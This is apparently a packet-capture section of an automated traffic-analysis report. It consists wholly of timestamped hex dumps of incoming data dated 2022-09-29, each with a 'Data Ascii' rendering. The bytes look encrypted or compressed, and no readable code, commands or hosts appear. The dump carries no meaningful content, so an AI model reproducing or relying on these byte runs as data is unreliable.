                                                                                                                                                    2022-09-29 12:59:14 UTC23143INData Raw: 1f 98 7b 23 17 79 f1 2d 73 13 99 f4 34 40 fa 6c 92 48 6f 27 c0 e4 17 7f a7 5d 23 3d bd 5e 5a f8 28 5d 8f c8 a2 c3 73 34 81 d4 fb 6b c0 20 af a0 7e 92 7e 91 53 4f cb d3 30 24 17 ff 79 39 f2 43 66 a3 b0 71 c2 58 e1 62 c3 36 36 8c 30 99 e6 dc 9e 34 77 25 fb 93 36 53 c5 3f 8e cb 48 aa 52 12 09 d4 60 ba 56 8c 2f 1f 55 ef 01 68 ec 43 cc ba e7 ad ed a6 81 f4 2c 3c a3 76 92 d1 99 7d 13 c5 6a cd 1a 65 17 03 a0 ac 7d fb 2c 8e ef 86 13 c4 49 e6 3e f5 c1 ca bb 3d 37 ea 04 20 70 99 b3 94 e3 a7 54 18 fb 1e 55 58 5f 6e 49 b1 f1 7b 97 81 31 68 f0 29 ff 5d c8 07 60 fc e3 07 44 c4 2e a7 47 42 33 1e 55 71 58 82 29 bd f0 6b c4 32 4e 5e e8 05 02 1c 0f 77 2f b2 ec ac bc ff cd 4d 3a fe 88 d9 4e 6d eb 9d c0 05 1e a9 f4 aa e1 8d fe a2 84 45 58 48 c1 d0 78 60 1d da d2 ae ab 63 8e
                                                                                                                                                    Data Ascii: {#y-s4@lHo']#=^Z(]s4k ~~SO0$y9CfqXb6604w%6S?HR`V/UhC,<v}je},I>=7 pTUX_nI{1h)]`D.GB3UqX)k2N^w/M:NmEXHx`c
                                                                                                                                                    2022-09-29 12:59:14 UTC23159INData Raw: d8 90 e4 67 95 17 b4 28 3f ac fa ed 1a 4f 1c dc 6c ae bb 1f eb e0 07 a3 22 10 c5 25 70 9a 1f b1 0e 29 fe ec dd 0d bc 57 48 f4 ec bd ac f4 c6 40 96 ef 28 dc 4b 62 8f 0d d4 8c 46 ea b3 01 86 54 b1 f3 96 f2 b1 41 2d cf 8a be 69 9a c6 27 b4 8e f2 5e 61 a8 aa 88 7c 10 69 85 c5 38 a7 23 29 15 28 2c 7d b0 35 0e 08 9a 96 c8 44 7f ef 44 e5 97 8f c5 6c 10 e9 a3 ae d7 58 d8 93 c9 f1 fc 08 17 65 90 af 24 33 6e c7 b3 ad 55 51 b2 76 57 53 5b ef 4d 1c 71 f2 f6 ad de dd 3a 64 d0 a5 2e 78 c0 60 6a 20 be 6d 20 9a 27 fd 2e 05 49 76 2e ed 30 12 76 74 a0 b9 41 03 bd d7 9d b9 9a 91 12 2f 46 8b 26 ea 3a e7 32 a0 d4 79 08 a8 17 5d de ad 7d 3b fb f2 33 40 ee 16 88 16 60 59 df c5 56 1b f2 fb 1d 5d 88 5d a0 42 09 8a e4 d7 36 f6 ca ba 4c 73 cc c1 59 57 7c 25 40 dd 96 01 b7 3c 59 29
                                                                                                                                                    Data Ascii: g(?Ol"%p)WH@(KbFTA-i'^a|i8#)(,}5DDlXe$3nUQvWS[Mq:d.x`j m '.Iv.0vtA/F&:2y]};3@`YV]]B6LsYW|%@<Y)
                                                                                                                                                    2022-09-29 12:59:14 UTC23175INData Raw: e9 e6 75 9b 31 e4 80 52 24 9c 51 67 73 4f 56 85 d4 38 fa b3 dd 2e 18 d4 ab 7c ed 90 55 f9 3e 05 d5 23 83 16 39 9a ca f1 3c a6 1d c1 7b 92 db 14 73 49 02 13 ed 64 72 5b 46 c0 68 d2 0b 5a af 7a d9 64 d4 66 c0 a2 8f 24 3c e3 14 ef 40 45 57 ea 4e 54 46 6f 47 8d 00 db 67 80 30 b8 c8 1b 5d 1a 5f 54 ab 04 e7 94 e0 82 c0 82 73 9f 28 c5 02 6e d2 66 90 8b da 91 9e 4c d0 46 1a 7f 4f 15 76 b7 9a 27 de f3 e5 65 67 d8 49 3b b5 72 b3 df ee b5 27 14 df 85 41 96 88 73 c6 f1 05 15 b0 7b 8b a3 b0 e2 cd 94 ce bb 18 da 33 bc f6 3d 1b 94 89 45 c8 2c 80 bf 38 8c c7 a0 43 d9 73 59 82 ab ce 07 4b 38 0e 16 04 81 08 2c ef 0a 77 cf 83 f1 ff 1b cb 19 95 a7 1c 0f 8d 1d 44 42 05 e4 a7 f1 98 5b f4 58 3f af cb 5f d5 da f9 9b 93 97 91 37 5f 2b bf b0 f7 7b e3 26 2f ae 8b d7 24 d1 2a a1 89
                                                                                                                                                    Data Ascii: u1R$QgsOV8.|U>#9<{sIdr[FhZzdf$<@EWNTFoGg0]_Ts(nfLFOv'egI;r'As{3=E,8CsYK8,wDB[X?_7_+{&/$*
                                                                                                                                                    2022-09-29 12:59:14 UTC23191INData Raw: c8 d2 1a 99 3c 3c 54 a1 68 ae 0c a5 c7 20 ee 3d be cd e9 86 7e 26 17 8b 49 16 54 17 27 07 97 c6 84 8b da 2d 4c 9e 97 46 17 9a b8 cb a9 17 f3 37 e5 bc 24 12 83 1d 1f 94 1f 85 f0 ef cb 6e 7e d1 6f 69 4a 09 e4 97 75 42 b1 da 49 76 e1 ed c1 ab 4c ad 51 65 51 35 d1 bc c2 38 b2 e8 7e 3e f5 88 ae 0b d7 66 a9 26 3c 7d f5 8d fd 04 64 9b 65 99 c7 d9 f6 4a 83 48 2a ec 6a 2b 43 ce 65 f3 9b fd 15 30 30 10 3f 37 43 93 fe 99 49 97 de 66 bb fc 8f 9c 71 0d 48 bb 08 dd 0a 25 2c 13 16 9e 40 51 00 9f 14 e7 77 15 ac 0d de e3 b7 d8 1c a6 ba 4a cd a3 0f cb 00 6b 10 33 0b 26 0d a1 7d 6c 3d 7b bb 24 db 6d 5b 9b 80 f8 45 95 73 cb 69 08 24 0b 81 d8 04 e8 dc ba c2 0e a5 7f 17 6e 47 50 43 d5 a1 bf 6b 65 20 67 3a b5 2d 74 b8 d4 46 88 e0 b0 c4 c3 0f 2a 2b fc a9 ff 1d 4d 6c 2d bd 7c c2
                                                                                                                                                    Data Ascii: <<Th =~&IT'-LF7$n~oiJuBIvLQeQ58~>f&<}deJH*j+Ce00?7CIfqH%,@QwJk3&}l={$m[Esi$nGPCke g:-tF*+Ml-|
                                                                                                                                                    2022-09-29 12:59:14 UTC23207INData Raw: c9 e2 e9 2f 17 54 e6 33 a5 33 e1 62 9d 1e 58 8f be 71 c2 6a f0 27 53 f6 f3 51 56 7d ed d0 27 33 d9 13 fc d7 2b 6b c7 93 c9 22 d4 ce 55 2e f3 57 a4 a0 84 07 ff 1e 71 93 04 30 48 53 81 9f 4b 2c b8 b4 bd 1a dd 8f 32 ae e3 d3 79 e1 ef 35 6e 31 86 3b af 1d 81 cd c7 04 3b ee 52 04 08 5a 4b 94 41 c2 b3 41 74 fe ea 76 42 60 9a 56 a3 56 66 a1 dd 05 fd fc ca c9 08 32 ca 26 3d 7a 9d 9d b0 31 05 39 f4 f7 5d 54 ba 4b 3d e3 fa 33 56 f3 a7 2b bc 3a d4 ca b8 d7 6a d2 7b a2 b8 b0 75 19 ea 7d 8e bb cc a0 85 d3 cc df 20 7c 5d 14 3d f7 7a 9c 85 89 ab 29 a8 af 2d fc 90 0d 4c eb 79 94 8e d1 b2 1e 54 a5 fa 7f 50 09 a1 aa e6 15 1d df 61 b4 6e e1 55 dc 38 e9 18 e2 27 fe fe 61 4c ce 4f 12 c0 40 93 28 e9 53 58 31 f2 08 7c 4e 80 d9 21 4a fd dd 5f e3 6e 98 e1 c1 7c 02 b9 8d b1 e6 e4
                                                                                                                                                    Data Ascii: /T33bXqj'SQV}'3+k"U.Wq0HSK,2y5n1;;RZKAAtvB`VVf2&=z19]TK=3V+:j{u} |]=z)-LyTPanU8'aLO@(SX1|N!J_n|
                                                                                                                                                    2022-09-29 12:59:14 UTC23223INData Raw: 7c 53 f6 75 63 6f 5a c6 19 94 7d aa 1e e7 73 9e 36 aa bb 7c 4b b6 c0 45 58 d5 5b 6c 20 1d 55 5d c4 e4 23 8e 3d 72 39 38 1d 43 68 52 18 c5 38 12 d3 91 75 ac c0 47 31 aa af 5e 5b f9 c5 95 51 3c cb 0d 81 bb 50 f7 c0 3c 2e df cd 39 91 6d bf 5a 43 97 70 9b 17 ac 8c 06 b6 58 c1 e2 08 4d 02 77 4a 06 49 17 89 f0 31 0c d5 81 b3 c0 32 e4 53 23 83 c4 39 35 f7 47 71 af a1 d9 54 df dc ff 38 f1 f5 3c ed 26 df df cd f1 ed 48 87 62 30 ed e9 dd b9 32 f3 18 92 05 76 30 5b 04 49 e6 cf a7 32 ba f3 c5 05 f9 0d 1f bb b7 d7 3b 2b c7 83 52 09 5d 06 fc e5 9b 65 4d ea c2 07 e7 03 df 94 cf 08 9d 5a f8 4d 1f 53 fc 69 73 7d 83 7a f0 4b b0 be 9a 69 32 5e bf f0 08 4b c9 5a 51 1d b4 82 f4 93 d5 1d 19 8d 37 00 67 c4 fc 3a fc 80 82 05 e7 73 b1 64 3b 73 aa da aa ac 8a 5a be 81 be 80 4d 9f
                                                                                                                                                    Data Ascii: |SucoZ}s6|KEX[l U]#=r98ChR8uG1^[Q<P<.9mZCpXMwJI12S#95GqT8<&Hb02v0[I2;+R]eMZMSis}zKi2^KZQ7g:sd;sZM
                                                                                                                                                    2022-09-29 12:59:14 UTC23239INData Raw: 02 a4 37 68 a7 c9 b3 0f 5a 05 a5 eb ba 5d 6d b7 9a 81 e6 fd 67 d4 d1 d6 1b 01 e4 8b 4b 74 6b 9f ab 62 3c 2d f4 b3 ad bb b9 91 91 d8 48 2c 2c 9d a3 37 0c 9c 11 88 98 3d cb 8a d5 65 1e d3 2f b7 19 dc 2a a2 02 53 df 76 cb 21 2d 3b cd ce 1e d5 c8 7c d0 92 38 ec 56 36 56 01 58 aa c6 e7 ce b3 13 51 8b 35 73 25 cf 01 a7 c5 1c 82 d7 47 31 ba 41 a5 e1 58 ab 19 c4 8d 3f 3b e3 65 a4 a1 b0 66 a6 78 c3 74 8a d9 92 e8 47 5d 4c 5c 41 b7 04 78 8c b7 a4 a0 d1 b3 82 51 d7 98 f0 d3 0e e9 4c 52 03 48 be 9f eb ce 0c 22 28 48 e9 95 47 fb 8d d5 c5 a1 2b e0 0d 7b 5f a3 8b 13 92 91 ef 0f 83 d5 d0 d1 db 32 90 24 80 96 ad a6 43 1b 0d 2b 19 27 2f d5 bf 1d f7 71 a6 2a af cc cc 73 fd ac dc e2 49 83 5b 7f 92 57 5e 47 69 58 51 d6 4c 65 e6 ec f4 42 b0 0d b9 ff 9a 2e f9 50 08 30 1e 09 c9
                                                                                                                                                    Data Ascii: 7hZ]mgKtkb<-H,,7=e/*Sv!-;|8V6VXQ5s%G1AX?;efxtG]L\AxQLRH"(HG+{_2$C+'/q*sI[W^GiXQLeB.P0
                                                                                                                                                    2022-09-29 12:59:14 UTC23255INData Raw: 2a fb 6c 74 a0 a3 4f 99 19 82 20 a1 0c bb 71 df 34 2c 52 e0 9c 75 86 95 c4 98 b4 19 a4 ad c2 aa b4 30 fb f9 d0 b9 91 ae 7f 3f e8 16 81 db 67 ec b8 f8 3c 0a e1 fc dd 82 50 02 26 b0 2b b3 8f 80 01 1e 03 1d 32 89 88 de fd ca e9 a0 30 10 c2 48 75 9b c0 cc 80 64 b1 f9 ac ec f2 70 1d 31 56 91 3d 7d b8 80 b9 a3 9a aa 96 50 05 3f c7 ea 02 f2 c8 70 80 a9 6a 1d 46 3c 3c 3e 70 c5 e3 f2 dd ce 2e ca 23 95 47 f2 5e df d2 c6 fa b3 a5 b9 38 86 5e eb 60 05 46 72 80 55 56 76 74 bf f4 ee 61 65 a2 07 41 06 63 90 23 c4 48 61 1d 93 17 a6 0f 07 03 36 98 16 02 1a 7f f8 b6 f2 51 2e 27 7c 6c 92 dc 1f 97 7b 04 23 47 f6 eb 76 f7 e8 ea 2c 4c 6d 17 14 5c d8 53 c6 d2 69 31 6f d1 85 13 50 99 e3 f6 ce f5 eb 8b e7 e3 c3 48 90 0d 63 5c c4 5e e3 d5 9b ac f8 6e 2c 82 c5 71 99 e0 f4 1c 3a 15
                                                                                                                                                    Data Ascii: *ltO q4,Ru0?g<P&+20Hudp1V=}P?pjF<<>p.#G^8^`FrUVvtaeAc#Ha6Q.'|l{#Gv,Lm\Si1oPHc\^n,q:
                                                                                                                                                    2022-09-29 12:59:14 UTC23271INData Raw: fa 14 57 fe 6f 50 f6 04 95 62 b4 d4 78 bc 4c 67 98 e2 42 7e 8d bb bd 58 ce a6 f9 10 3c e6 23 5b 85 1f d8 bf d9 c1 46 42 39 12 63 75 fe 8c ce 36 ff 11 29 ee 17 77 ee 46 e0 87 cc b5 2d 89 5a 2c 02 08 36 50 c2 1e 03 25 23 07 1a 17 3a de 71 aa a2 9a 25 cc 5d a6 dc 5e fd f2 53 c3 1e 44 94 af ff d2 bf e4 e8 6d c7 03 ce b0 ec e5 92 f5 ac be de b9 ea 69 6e fd 2d 72 fb 5c 01 ff ee 5a ad db a0 be 6b b7 30 75 e0 a8 aa 64 f5 88 01 2a d3 d8 5e 39 00 93 28 27 ab df 1b 43 46 ba dd 0b ef 2e 6a 62 19 bf 1c 66 a8 bc e9 61 66 d7 66 18 6e 35 2f 86 7c 3c 1e 16 d7 e3 a5 bf 6b 06 43 32 ef 65 3f 9b 61 ee c2 34 32 5b b2 85 0e fa 7e a3 26 77 88 cf 4e 71 6b 94 df 06 aa 9e 44 0d 97 68 b2 de 1d 6c c7 23 a4 92 8c ea 74 ed d5 7f 05 84 89 36 31 35 d3 2f 85 f4 56 36 cf 1f 8c f4 29 ee 64
                                                                                                                                                    Data Ascii: WoPbxLgB~X<#[FB9cu6)wF-Z,6P%#:q%]^SDmin-r\Zk0ud*^9('CF.jbfaffn5/|<kC2e?a42[~&wNqkDhl#t615/V6)d
                                                                                                                                                    2022-09-29 12:59:14 UTC23287INData Raw: 48 9f c0 fb cb 0c c3 3d 52 75 29 7d db d4 d9 92 9d 62 ac d5 bf 23 d0 68 fc 99 ac 7c 9a 1c 17 74 94 c3 a6 61 60 f7 96 95 12 91 51 a5 43 20 de d2 06 a4 9f 45 62 9d 47 5b ad 05 dc b7 61 a6 7c 0a b4 00 b7 7e 74 9c 87 d0 09 c4 5b e6 35 0b 60 8a 48 b7 9a 45 3f 53 a8 5d 8d db 3d ea 41 38 81 87 9a a9 23 a0 86 52 84 48 ca e3 41 70 1f e9 00 9e 91 65 ab a6 4d a5 49 7f 78 51 d5 6e 5b 13 f2 c7 b9 16 3f 42 fe 58 ac be 67 5d d9 4e 0d d8 c5 90 58 4c 0a 0c ce 19 29 b6 5d 0c f1 79 7b e4 37 5d 50 49 3a 50 7c 9d 8e 73 03 7d 0d 03 3c 72 31 56 39 0a fa 26 97 f6 65 51 59 f6 54 d1 c4 a8 22 6b f2 76 57 3b 93 a5 07 e6 13 12 9e d8 81 34 6b 63 6f 0d 23 b7 6c 95 7f 8d c6 64 77 fd 6b 2c cd e7 ff 93 10 35 e8 1a fe 84 f5 55 26 b9 f8 22 2d 26 46 42 20 8c 05 6b 44 9a df b4 06 3f 5b d8 78
                                                                                                                                                    Data Ascii: H=Ru)}b#h|ta`QC EbG[a|~t[5`HE?S]=A8#RHApeMIxQn[?BXg]NXL)]y{7]PI:P|s}<r1V9&eQYT"kvW;4kco#ldwk,5U&"-&FB kD?[x
                                                                                                                                                    2022-09-29 12:59:14 UTC23303INData Raw: 1a 31 17 19 ab 2e c6 55 90 26 e3 c7 04 8b 91 53 67 3e 97 1f 02 ea ed 8f bd ef 70 9f 1f 69 16 14 07 5a 3a fb 40 a3 81 b3 b5 c8 d0 80 7a e3 77 7b 87 ab 57 b0 95 17 0b 5b e2 4b d9 e2 76 5f ab 68 21 20 0d 8e 61 d9 77 7c ea aa e0 a8 b4 fe 92 25 29 7e 9e 98 a4 85 65 2f c2 0d f9 2f 4b 76 75 2f d3 d1 3e 67 61 24 8a f7 f2 39 b8 7e d1 62 9c 83 41 51 2d bd 7c af 47 d0 6e 41 a8 9b 5e f8 39 10 76 0a eb 60 6b ab 7f 58 ae ec 81 35 6d b8 73 b9 1a 14 bd 64 16 bb 07 c5 b8 9e 92 62 9f c6 3f 08 1d 63 37 93 5b 45 eb 0a 5e 0d 73 81 67 d7 3f 10 8d 11 26 b9 d6 a9 a5 0b c5 76 90 ca 9e c8 7c b3 dc 4e 3e 07 3c f8 6d 5c 34 e0 4c 78 de bd fc fc 09 68 c4 1e 8a 46 63 3d 95 cd 77 08 6d ec 45 eb 59 54 04 0a 67 15 55 fa a7 10 1e da ab 0f c5 65 25 e4 b6 d2 d0 8e 96 57 da cf 19 21 2c 81 ae
                                                                                                                                                    Data Ascii: 1.U&Sg>piZ:@zw{W[Kv_h! aw|%)~e//Kvu/>ga$9~bAQ-|GnA^9v`kX5msdb?c7[E^sg?&v|N><m\4LxhFc=wmEYTgUe%W!,
                                                                                                                                                    2022-09-29 12:59:14 UTC23319INData Raw: b6 b1 91 27 0f bb cb ab 8a 09 97 cc 2e f2 3c ac 96 74 8f 42 de 80 c2 c6 46 b7 fb b7 4a 78 0b a5 8a 3e dc f3 9c 63 b9 8d 52 a1 a5 35 7f a8 92 6e 1a d6 b3 bd 7e 1c f5 d1 d2 0e 01 fa 9a 0f c1 49 36 ba 76 cc 76 71 e3 fb 75 d8 ca 0a 07 1e 3b 1e 11 aa e8 88 e2 80 9a 92 de 81 c1 9a bd 01 9e f3 ec ca a8 69 0a d1 0f 02 cd d4 bd 64 8d 96 84 1a d1 24 9d 0d a9 f3 8c c7 86 c0 7a b0 7d 47 08 7b 35 10 2e 6c 26 ef 9c b4 13 e6 4f 79 c5 3b df 3e 53 0d 3d 71 b7 98 a8 f6 95 ef 53 ca 14 64 2b f2 d5 bb 6a 8c 27 e4 53 3f 0e cd be ce 86 e8 b8 f0 57 14 1e 3b 95 37 22 44 f6 31 a9 d7 c4 2f 13 0d 2c c2 af 45 b1 6c ed 19 62 f8 73 e6 2b 90 4d d5 fd f8 85 25 04 ba 06 24 9b 86 22 26 00 9b 08 36 40 2c 5d 49 87 23 5d ae c1 c9 8d 81 17 44 a0 6a b7 61 41 ba 7c e6 a4 aa b8 76 76 da a1 74 78
                                                                                                                                                    Data Ascii: '.<tBFJx>cR5n~I6vvqu;id$z}G{5.l&Oy;>S=qSd+j'S?W;7"D1/,Elbs+M%$"&6@,]I#]DjaA|vvtx
                                                                                                                                                    2022-09-29 12:59:14 UTC23335INData Raw: 01 a1 41 59 b7 88 29 7c 39 ab ad 88 13 3f 91 47 b5 de 8c 09 6f 23 45 cd 00 6c f2 1d 31 45 ab 27 4e 7c 42 5e bf 27 fc 4a c4 19 10 be 1d 7b 5b d7 b0 07 7e d8 18 79 9a e7 29 7d c8 16 9d 44 d9 0a a4 fb ff 02 89 8f bd 26 66 56 73 25 41 df ed 1b bc fa d8 e9 3c 89 34 ac f8 4a 6e 5f b7 ca 30 a8 19 16 24 ae 27 b6 52 cb f8 d3 8d 5c 64 26 0b 41 fa c8 8c 0c 6d e4 58 a5 f0 38 1d 69 35 e3 3f 79 9e 99 b7 50 d4 90 bf e2 31 87 7d b3 62 23 1f 37 13 40 cc 88 24 14 7d da 74 97 95 8d 20 aa 10 31 2d 6c 9d 0c 07 ce 8a e0 42 40 de 50 74 c2 fe 7c 83 ed 13 d8 ff 4b 04 ea 7a f4 fd b6 55 b4 6b 9a 18 1e 31 d3 af e1 f0 ed 3c eb 9b d5 ad 43 ff fd 8b 34 ae b8 4e c9 2b bf 0b 34 7c c3 c6 66 ad 28 5c 3d f9 e6 3c a3 a4 cb 83 63 8b 4a b4 ab 3f 62 4f 4c 96 38 2e 98 ed ce 0f 32 73 8c f3 95 3b
                                                                                                                                                    Data Ascii: AY)|9?Go#El1E'N|B^'J{[~y)}D&fVs%A<4Jn_0$'R\d&AmX8i5?yP1}b#7@$}t 1-lB@Pt|KzUk1<C4N+4|f(\=<cJ?bOL8.2s;
                                                                                                                                                    2022-09-29 12:59:14 UTC23351INData Raw: 1f 2e 01 6e 07 70 a3 df 86 4b 36 98 01 e6 03 85 22 10 5c 5d ef 9e 88 25 6c fe b9 ec 8b d8 d9 4c e8 65 4a 74 24 3b 8c 0f 7e c4 28 2f 41 e7 70 99 5d 4f ca 0d b8 16 53 a6 45 3b 34 bf 30 4d 75 30 01 ff 33 d2 cf 78 30 e0 5b e3 0b ea 29 34 08 7e fa 46 9c a8 0e 90 0b 03 42 80 ad fc 8b ad 51 98 b1 26 b5 00 cf 0e 71 33 a8 95 5d 22 25 b8 2b b4 71 75 6c 47 b1 0b a1 8a 24 f0 1e 81 23 0e 5c c5 40 d0 a9 9e ec 5d 26 55 3c d1 b1 e5 a9 b4 12 b4 bd 41 d1 74 6e 8e ff 4d 13 92 8e d6 0c 00 74 60 99 a2 a0 07 2b b4 98 f8 0a 55 78 cf 44 6b 34 43 45 87 70 f7 bc 5e 8b cf bf 78 b0 fa 6f ac 15 fd 90 27 1c 21 c5 44 9e 0f 83 4a e7 d8 d0 7a 8f 9a a4 01 bd 3e a7 0e 6a 69 0c bd 9c 43 32 7c aa ef 10 40 17 dc a2 96 86 66 d7 e4 0c 78 f2 47 ff 37 cf 7b 51 22 c1 62 da 34 70 73 97 59 d5 79 9d
                                                                                                                                                    Data Ascii: .npK6"\]%lLeJt$;~(/Ap]OSE;40Mu03x0[)4~FBQ&q3]"%+qulG$#\@]&U<AtnMt`+UxDk4CEp^xo'!DJz>jiC2|@fxG7{Q"b4psYy
                                                                                                                                                    2022-09-29 12:59:14 UTC23367INData Raw: a6 85 34 56 25 10 2d 6d 7f 59 d2 f0 7c 75 4b 2a 56 42 1c 4e 4a d4 d0 9b cf 8f a9 6e de 44 8f 5b 4f 77 1b 4e ae 50 d6 85 27 34 8b d3 42 cf 7a e6 74 23 7d bd 78 89 08 80 9e 34 37 df 79 93 16 cb d5 c7 25 9c b5 c2 03 ef 7e 02 50 84 3f 83 28 47 f7 96 b6 9c fe 87 b3 4d 34 39 db 5f 33 70 52 4d 4e 4e 46 59 e5 e5 73 18 07 8c b5 d8 41 ba 27 37 99 c4 73 1e 9b 5e 57 0a db d7 62 fe a1 a5 eb c9 c1 88 f1 71 64 d5 4d b3 5d 50 ed 9e 75 47 35 bf b2 ac 77 e9 3a 16 1f 04 c5 57 f5 db 7d 41 f5 e5 39 ca 9a 54 d2 08 82 56 08 49 dc 50 9f ad 11 93 58 9c 09 18 62 39 81 64 16 ce b0 ee a7 48 8f 91 55 26 62 71 f5 24 cd fc 8e 6c 05 01 78 59 b8 bd b0 da 08 a0 aa 12 35 f4 2b 5f 83 16 fc 8f d6 2d 71 46 4c 13 5b f3 61 28 40 eb 50 e8 bc 57 e0 7a c3 82 97 99 67 3b d4 2c 55 3e ef f5 7d 90 63
                                                                                                                                                    Data Ascii: 4V%-mY|uK*VBNJnD[OwNP'4Bzt#}x47y%~P?(GM49_3pRMNNFYsA'7s^WbqdM]PuG5w:W}A9TVIPXb9dHU&bq$lxY5+_-qFL[a(@PWzg;,U>}c
                                                                                                                                                    2022-09-29 12:59:14 UTC23383INData Raw: 21 df 45 83 29 5b 4d d9 fb e0 e4 67 d4 ac cc 0e f6 e4 3c c6 44 75 47 ed cc 73 13 fd a9 f6 2a a5 b1 f3 f4 c3 2b 84 1b bd 2f b2 79 8d 82 2b 18 1f 64 7c 62 89 ce f2 a4 92 ee 3d b8 e4 62 18 8d af af 91 dd 53 dc 3a 07 b7 7d 32 b0 81 f5 ff 74 1a cd 09 35 15 e2 46 0f 50 6b 82 32 c8 85 e9 f8 fc 67 90 24 ac e9 89 2e f2 dd e0 2e ec b2 3f 6c 36 98 f9 b2 45 b7 8d a0 29 44 6d fe d3 09 76 08 ca ed 54 3f 0d 86 bd 54 bd 62 0e 75 f4 97 5d fb 55 e2 fb 99 53 5a fd 28 f7 cc f9 ea 49 53 b4 18 f3 18 27 ff 0f fb 3f 26 6f 95 a4 b6 69 f3 53 c6 7d 28 55 99 c2 b9 d6 0b 70 61 78 59 dd 27 80 af f8 e6 2b 55 e9 c9 8b 7a 3b 77 2d 14 80 93 a0 70 6a 8e 2d 77 00 e3 84 c3 8e 57 ea 7f cd 7d 97 ce b6 e6 f9 eb 55 19 14 4b 56 88 8f a4 37 6f c2 e0 26 2e 24 e4 26 40 0d bd 5a 76 ff 6a 70 d0 81 55
                                                                                                                                                    Data Ascii: !E)[Mg<DuGs*+/y+d|b=bS:}2t5FPk2g$..?l6E)DmvT?Tbu]USZ(IS'?&oiS}(UpaxY'+Uz;w-pj-wW}UKV7o&.$&@ZvjpU
                                                                                                                                                    2022-09-29 12:59:14 UTC23399INData Raw: 5e c0 f6 44 9d 36 83 92 eb 61 10 b3 e4 be 7b f5 e2 f9 9f fd 72 f4 67 34 0a c8 5c 4f de fd 8d 86 c7 2b bb 61 58 5c d1 92 67 b6 47 1e 1b 3e db 78 97 8b fb 82 0e 88 98 56 c6 1e 2e 65 ce 38 4e bb b3 d3 e7 72 be 0b eb 50 74 9a f0 6a f3 57 24 ed b6 7a 2a c5 42 94 1f 1f ba 3c 0e 85 b4 04 66 4c 6d 1e 85 b8 95 13 f4 61 1d 34 9b d5 6e 66 73 66 26 2d 5a dc b2 db 02 87 9e f4 dc 15 8d fd 9c ab b2 f1 fd df 61 51 3a 7a d8 31 0a bb 39 39 72 3b 1f 4f 77 ec 42 e1 cd 3b 04 61 ca d4 d3 b9 66 83 32 46 b7 da ea bd df 30 ce f8 6f cf fb dc 15 86 02 72 ee 43 3c 6a 51 bb 53 05 09 ea d5 7d 69 14 87 ad a5 71 cf fe d1 a1 55 db 07 a7 43 c8 bc a8 a7 75 7d 94 c8 14 d4 1b e1 7e 7f 54 d9 65 4b 7b 35 16 12 3f 78 35 10 62 d9 c6 d9 cb a1 52 39 a2 4f 2d 71 2d 66 48 fe 5d ef 6c b7 d8 e3 96 16
                                                                                                                                                    Data Ascii: ^D6a{rg4\O+aX\gG>xV.e8NrPtjW$z*B<fLma4nfsf&-ZaQ:z199r;OwB;af2F0orC<jQS}iqUCu}~TeK{5?x5bR9O-q-fH]l
                                                                                                                                                    2022-09-29 12:59:14 UTC23415INData Raw: 49 c5 72 9b 90 46 ba 6c fe 9b ba 67 e4 ae 9c f8 cc 04 08 8a aa 4b df a4 f1 95 89 4e 83 37 b7 00 1b 1f d1 78 86 90 c9 d3 f1 4d 18 82 47 fc 78 d0 0f 99 06 77 0f 81 a2 69 3c 47 4c d5 fd fb 74 f8 df 26 76 a0 21 ab 67 09 30 fd 08 6b 71 e2 17 bc 84 30 b3 c3 f9 51 4d 1c a3 2d ee 83 90 f8 f3 1e e5 b6 03 dd 55 b6 54 e0 f4 4e cb 6b aa a0 ff f5 64 9e 62 c9 52 63 3d b0 71 01 7b 2e 4d 23 c8 2b 3b 5c a6 69 27 0b c6 68 5c 66 86 12 41 80 71 1e ae 13 24 7e 1e 54 09 95 03 88 65 21 d0 c6 34 17 76 09 d9 67 36 1e f4 ee 3b a0 61 bd 4d 7e 01 84 37 52 e3 6d 26 37 9a 3f 67 63 51 ba 2a b9 93 1a 3d 25 e1 0c 8c 7a 30 7e eb 5f 01 36 f1 39 cf bd 3a 2b e5 38 87 bf e6 32 be 63 46 01 50 4e 42 e1 4f 39 29 2b a8 01 1b a8 39 44 59 d5 71 bb 2e 32 91 0a d1 29 b3 40 d7 a8 9c 12 7e 77 21 4a 0d
                                                                                                                                                    Data Ascii: IrFlgKN7xMGxwi<GLt&v!g0kq0QM-UTNkdbRc=q{.M#+;\i'h\fAq$~Te!4vg6;aM~7Rm&7?gcQ*=%z0~_69:+82cFPNBO9)+9DYq.2)@~w!J
                                                                                                                                                    2022-09-29 12:59:14 UTC23431INData Raw: 75 e1 f1 c3 90 72 9f 89 b2 1a e5 1e 91 db 03 ba 21 1f f8 9b 64 33 44 bd 51 5c 50 94 0f 0d 26 3d 97 76 44 fb 82 8b eb 0b 26 e5 05 0e 2c 72 89 f4 71 e4 89 99 08 14 f2 a5 b0 79 e1 30 1d 8d 39 f0 33 3e 42 60 53 ca 9d 0a 7f 3c 32 d4 63 90 f9 e8 e4 86 72 16 53 0e 55 23 29 9e 9d 15 57 9c 09 76 94 e0 84 bd c4 a0 f0 7b f7 87 d7 fd 43 ca 1e a4 77 3f 59 95 a8 44 5e de 99 ef b6 d6 71 fe 95 a5 6f eb 7e db 7b a7 7c 71 8c b3 72 ae 5a 1e e4 af 56 07 98 89 e5 d8 b8 f4 c5 34 de 50 97 ae 1f 63 89 d2 34 80 d0 4f 11 5a 62 6d 12 b7 00 3e c4 9a 32 af 3c a1 40 ab 4c 0f 3d f4 08 03 2b b7 d0 75 49 38 26 b2 81 43 6c 08 cc 85 95 0d 10 fb 44 70 24 55 6f c5 ce 79 54 d7 b1 4b b2 79 f5 73 9d c3 b3 9c 12 89 72 41 fb 1a eb b4 1e 83 39 64 fe 34 c3 97 59 bd 12 59 62 46 78 66 23 a3 57 ef 53
                                                                                                                                                    Data Ascii: ur!d3DQ\P&=vD&,rqy093>B`S<2crSU#)Wv{Cw?YD^qo~{|qrZV4Pc4OZbm>2<@L=+uI8&ClDp$UoyTKysrA9d4YYbFxf#WS
